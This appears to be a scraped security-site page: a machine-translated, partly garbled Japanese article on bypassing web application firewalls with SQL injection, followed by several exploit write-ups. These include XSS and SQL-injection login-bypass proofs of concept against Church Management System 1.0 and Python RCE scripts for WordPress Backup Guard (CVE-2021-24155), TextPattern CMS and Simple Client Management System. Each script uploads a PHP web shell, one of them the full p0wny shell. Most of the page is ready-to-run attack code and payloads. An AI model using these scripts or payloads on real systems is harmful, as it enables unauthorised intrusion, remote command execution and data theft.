HireHackking

SQL注入でWAFをバイパスする9つの方法 0x01はじめに WAFは従来のファイアウォールとは異なります。WAFは特定のWebアプリケーションのコンテンツをフィルタリングできるのに対し、従来のファイアウォールはサーバー間の防御ゲートとして機能します。 HTTPトラフィックをチェックすることにより、SQLインジェクション、クロスサイトスクリプト（XSS）、ファイル包含、セキュリティ構成エラーなどのブロッキングなどのWebアプリケーションセキュリティの脆弱性から保護できます。 0x02 WAF作業原理 §例外プロトコルの検出：HTTP標準に準拠していないリクエストを拒否する §入力検証の強化：クライアント側の検証だけでなく、プロキシとサーバー側の検証 §ホワイトリストとブラックリスト §ルールベースと例外保護：ルールベースのメカニズムは、より黒ベースで柔軟な例外です §国家管理：防衛セッション保護（Cookie保護、反侵入回避技術、対応監視、情報開示保護）。 0x03バイパスwaf 1。Casechangeの混合悪意のある入力トリガーWAF保護をトリガーし、WAFがケースに敏感なブラックリストを使用している場合、このフィルターをバイパスする可能性があります。 http://target.com/index.php?page_id=15ユニオン選択1,2,3,4 2。キーワードを交換します（wafで削除される特殊文字を挿入）---選択は、選択する場合があります。特殊文字が削除されると、Selectで実行されます。 http://Target.com/index.php?page_id=15nbsp; uniunionon selselectect 1,2,3,4 3。エンコードpage.php？id=1％252f％252a*/union％252f％252a /選択 ヘキサデシマルエンコーディング：Target.com/index.php?page_id=15 /*！u％6eion*//*！se％6cect*/1,2,3,4…select（extractvalue（0x3c613e61646d696e3c2f613e、0x2f61）） :id=10％d6 '％20and％201=2％23選択 'ä'='a'; ＃1 4。攻撃文字列にコメントを使用します------コメントを挿入します。例えば/*！ select */はWAFで無視される場合がありますが、ターゲットアプリケーションに渡されると、MySQLデータベースによって処理されます。 index.php？page_id=-15 ％55NION/**/％53Elect 1,2,3,4 'Union％A0Select Pass fromユーザー＃ index.php？page_id=-15 /*！Union*//*！Select*/1,2,3 ？page_id=null％0a/** //*！50000％55nion*//*yoyu*/all/**/％0a/*！％53Elect*/％0a/*nnaa*/+1,2,3,4… 5。同等の機能とコマンド---キーワード検出のためにいくつかの関数またはコマンドを使用することはできませんが、多くの場合、同等または類似のコードを使用できます。 hex（）、bin（）== ascii（） sleep（）==benchmark（） concat_ws（）==group_concat（） substr（（select 'password'）、1,1） =0x70 strcmp（左（ 'パスワード'、1）、 0x69）=1 strcmp（左（ 'パスワード'、1）、 0x70）=0 strcmp（左（ 'パスワード'、1）、 0x71）=-1 mid（）、substr（） ==substring（） @@ user==user（） @@ datadir==datadir（） 5。特別なシンボル----特別なシンボルには、特別な意味と使用法があります + `symbol: select` version（） `; ++-:Select+ID-1+1.ユーザーから。 + @:Select @^1.Fromユーザー; +mysql function（）as xxx + `、〜、 @、％、（）、[]、 - 、 +、|、％00 例: 'se'+'lec'+’t' ％s％e％l％e％c％t 1 1.aspx？id=1; exec（ 'ma'+'ster.x'+'p_cm'+'dsh'+'ell 「ネットユーザー」 '） 'または - +2= - !' 2 id=1+（uni）（on）+（sel）（ect） 7。HTTPパラメーター汚染------複数のパラメーター=値を視聴およびバイパスするために値の値を提供します。 http://example.com？id=1？d='または' 1 '=' 1 ' - ' - 'in（例えば、Apache/PHPを使用する）を考えると、アプリケーションは最後の（2番目の）ID=のみを解析し、WAFは最初のID=のみを解析します。これは合理的な要求のように思えますが、アプリケーションは依然として悪意のある入力を受信して処理します。今日のほとんどのWAFは、HTTPパラメーター汚染（HPP）の影響を受けませんが、まだ試してみる価値があります。 hpp（httpパラメーター分析）： /？id=1; select+1,2,3+from+users+where+id=1— /？id=1; select+1amp; id=2,3+from+users+where+id=1— /？id=1/**/union/*amp; id=*/select/*amp; id=*/pwd/*amp; id=*/from/*amp; id=*/usershppは繰り返しパラメーター公害としても知られています。 =3。この場合、異なるWebサーバーは次のように処理します：HPF（HTTPパラメーターセグメンテーション）：この方法は、CRLFと同様のHTTPセグメンテーションインジェクションです（コントロール文字0A、％0Dなどを使用します。 /？a=1+union/*amp; b=*/select+1、pass/*amp; c=*/from+users-- a=1から *を選択します Union/*およびb=*/select 1、pass/* limit*/fromユーザー - HPC（HTTPパラメーター汚染）: RFC2396は次の文字を定義します。 unsurved: a-z、a-z、0-9および_。 〜 * '（） 予約済み: /？ @ amp; =+ $、 賢明な: {} | \ ^ [] ` 異なるWebサーバー処理プロセスには、特別なリクエストの構築時に異なるロジックがあります。マジック文字のための％ASP/ASP.NETは影響を受けます 8。バッファオーバーフロー--- WAFは常にアプリケーションであり、他のアプリケーションと同じソフトウェアの欠陥を受けやすい。バッファオーバーフローの脆弱性が発生した場合、コードの実行を引き起こさない場合でも、WAFがクラッシュする可能性があります。WAFが適切に実行される可能性があります。 ？id=1および（select 1）=（select 0xa*1000）+Union+Select+1,2、version（）、4,5、database（）、user（）、8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 9.統合統合とは、さまざまなバイパス技術を使用することを意味します。単一のテクノロジーはフィルタリングメカニズムをバイパスできない場合がありますが、さまざまなテクノロジーを使用してそれらを混合する可能性が大きくなります。 Target.com/index.php?page_id=15+and+ (Select 1）=（[0xaa]を選択します[.（約1000を追加します 'a'）.]）+/*！union*/+/*！select*/+1,2,3,4… id=1/*！union*/+select+1,2、concat（/*！table_name*/）+from /* information_schema*/.tables/*！where*/+/*！table_schema*/+like+database（） - ？id=-725+/*！union*/+/*！select*/+1、group_concat（column_name）、3,4,5+from+/*！Information_schem*/。columns+where+table_name=0x41646d696e------ 参照リンク：https://vulnerablelife.wordpress.com/2014/12/18/web-application-firewall-bypass-techniques/ wiz_tmp_tag id='wiz-table-range-border' contentedable='false' style='display: none;'

# Exploit Title: Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # Proof of Concept : #Payload: <img src=x onerror=alert(1)> #Injectable parameters : amount= and trcode= ###################### REQUEST ########################################## POST /cman/members/Tithes.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 85 Origin: http://localhost Connection: close Referer: http://localhost/cman/members/Tithes.php Cookie: PHPSESSID=cne2l4cs96krjqpbpus7nv2sjc Upgrade-Insecure-Requests: 1 amount=<img+src%3dx+onerror%3dalert(1)>&trcode=<img+src%3dx+onerror%3dalert(1)>&save=

# Exploit Title: Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication. # Proof of Concept : 1-Go to http://target.com/cman/admin 2-Write the following payload to username and admin parameter and click login. ######################## REQUEST ############################### POST /cman/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 51 Origin: http://localhost Connection: close Referer: http://localhost/cman/admin/index.php Cookie: PHPSESSID=cne5l4cs93krjqobput7nv7sjc Upgrade-Insecure-Requests: 1 username=test&password=%27+or+%27a%27%3D%27a&login= ################################################################ PAYLOAD: # username : test # password : ' or 'a'='a

# Exploit Title: Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated) # Date 02.07.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://backup-guard.com/products/backup-wordpress # Software Link: https://downloads.wordpress.org/plugin/backup.1.5.8.zip # Version: Before 1.6.0 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24155 # CWE: CWE-434 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24155/README.md ''' Description: The plugin did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE. Additional Info, and Bypass of .htaccess protection found by WPScanTeam, while confirming the issue: There is a protection in place against accessing the uploaded files, via a .htaccess in the wp-content/uploads/backup-guard/ folder, however: - Some web servers do not support .htaccess, e.g Nginx, making it useless in such case - Arbitrary content can be appended to the existing .htaccess, to make the deny from all invalid, and bypass the protection on web servers such as Apache Note: v1.6.0 forced the uploaded file to have the .sgbp extension by adding it if not present, but the file content is not verified, which could still allow chaining with an issue such as LFI or Arbitrary File Renaming to achieve RCE ''' ''' Banner: ''' banner = """ ______ _______ ____ ___ ____ _ ____ _ _ _ ____ ____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | ___| ___| | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| |___ \___ \ | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |___) |__) | \____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_|____/____/ * Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated) * @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: print('') auth = session.post(auth_url, headers=header, data=body) auth_header = auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print('[+] Authentication successfull !') else: print('[-] Authentication failed !') exit() ''' Retrieve Token for backup: ''' token_url = "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=backup_guard_backups' # Header (Token): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/users.php', "Connection": "close", "Upgrade-Insecure-Requests": "1" } # Get Token: print('') print('[+] Grabbing unique Backup Plugin Wordpress Token:') token_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups' init_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/index.php' init_request = session.get(init_url).text token_request = session.get(token_url).text token_start_in = token_request.find('&token=') token_start_in = token_request[token_start_in + 7:] token = token_start_in[:token_start_in.find('"')] print(' -> Token: ' + token) ''' Exploit: ''' print('') print('[*] Starting Exploit:') exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=' + token # Header (Exploit): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups', "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------17366980624047956771255332862", "Origin": 'http://' + target_ip, "Connection": "close" } # Body (Exploit): Using p0wny shell: https://github.com/flozz/p0wny-shell body = "-----------------------------17366980624047956771255332862\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"shell.php\"\r\nContent-Type: image/png\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------17366980624047956771255332862--\r\n" session.post(exploit_url, headers=header, data=body) print('[+] Exploit done !') print(' -> Webshell uploaded to: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/backup-guard/shell.php') print('')

# Exploit Title: TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated) # Date: 07/04/2021 # Exploit Author: Mevlüt Akçam # Software Link: https://github.com/textpattern/textpattern # Vendor Homepage: https://textpattern.com/ # Version: 4.9.0-dev # Tested on: 20.04.1-Ubuntu #!/usr/bin/python3 import requests from bs4 import BeautifulSoup as bs4 import json import string import random import argparse # Colors RED="\033[91m" GREEN="\033[92m" RESET="\033[0m" parser = argparse.ArgumentParser() parser.add_argument('-t', '--url', required=True, action='store', help='Target url') parser.add_argument('-u', '--user', required=True, action='store', help='Username') parser.add_argument('-p', '--password', required=True, action='store', help='Password') args = parser.parse_args() URL=args.url uname=args.user passwd=args.password session=requests.Session() def login(uname,passwd): data={'lang':'en','p_userid':uname,'p_password':passwd} r_login=session.post(URL+"/textpattern/index.php",data=data, verify=False) if r_login.status_code == 200: print(GREEN,f"[+] Login successful , your cookie : {session.cookies['txp_login']}",RESET) else: print(RED,f"[-] Login failed",RESET) exit() def get_token(): print(GREEN,f"[+] Getting token ",RESET) r_token=session.get(URL+"/textpattern/index.php?event=plugin") soup = bs4(r_token.text, 'html.parser') textpattern = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-1] textpattern = json.loads(textpattern) return textpattern['_txp_token'] def upload(): file_name=''.join(random.choice(string.ascii_lowercase) for _ in range(10)) file={ 'theplugin':( file_name+".php", """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?> </pre> </body> </html> <!-- """+file_name+" -->" ),# The file_name is used to verify that the file has been uploaded. 'install_new':(None,'Upload'), 'event':(None,'plugin'), 'step':(None,'plugin_upload'), '_txp_token':(None,get_token()), } r_upload=session.post(URL+"/textpattern/index.php",verify=False,files=file) if file_name in r_upload.text: print(GREEN,f"[+] Shell uploaded",RESET) print(GREEN,f"[+] Webshell url : {URL}/textpattern/tmp/{file_name}.php",RESET) else: print(RED,f"[-] Shell failed to load",RESET) print(RED,f"[-] Bye",RESET) exit() if __name__=="__main__": login(uname,passwd) upload() print(GREEN,f"[+] Bye",RESET)

# Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE) # Date: July 4, 2021 # Exploit Author: Ishan Saha # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip # Version: 1.0 # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali #!/usr/bin/python # Description: # 1. This uses the SQL injection to bypass the admin login and create a new user # 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server # 3. the shell is called from the location import requests from colorama import Fore, Back, Style ''' Description: Using the sql injeciton to bypass the login and create a user. This user creates a client with the shell as an image and uploads the shell. The shell is called by the requests library for easier use. ------------------------------------------ Developed by - Ishan Saha & HackerCTF team (https://twitter.com/hackerctf) ------------------------------------------ ''' # Variables : change the URL according to need URL="http://192.168.0.248/client/" shellcode = "<?php system($_GET['cmd']);?>" filename = "shell.php" authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"} createuser = {"fname":"ishan","lname":"saha","email":"research@hackerctf.com","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"} userlogin={"uemail":"research@hackerctf.com","password":"Grow_with_hackerctf","login":"LOG IN"} shelldata={"fname":"a","lname":"l","uname":"l","email":"l@l.l","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"} def format_text(title,item): cr = '\r\n' section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr item=str(item) text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET return text ShellSession = requests.Session() response = ShellSession.get(URL) response = ShellSession.post(URL + "admin/index.php",data=authdata) response = ShellSession.post(URL + "admin/regester.php",data=createuser) response = ShellSession.post(URL,data=userlogin) response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")}) location = URL +"img/" + filename #print statements print(format_text("Target",URL),end='') print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='') print(format_text("shell location",location),end='') print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!")) while True: cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET) if cmd == 'exit': break print(ShellSession.get(location + "?cmd="+cmd).content.decode())

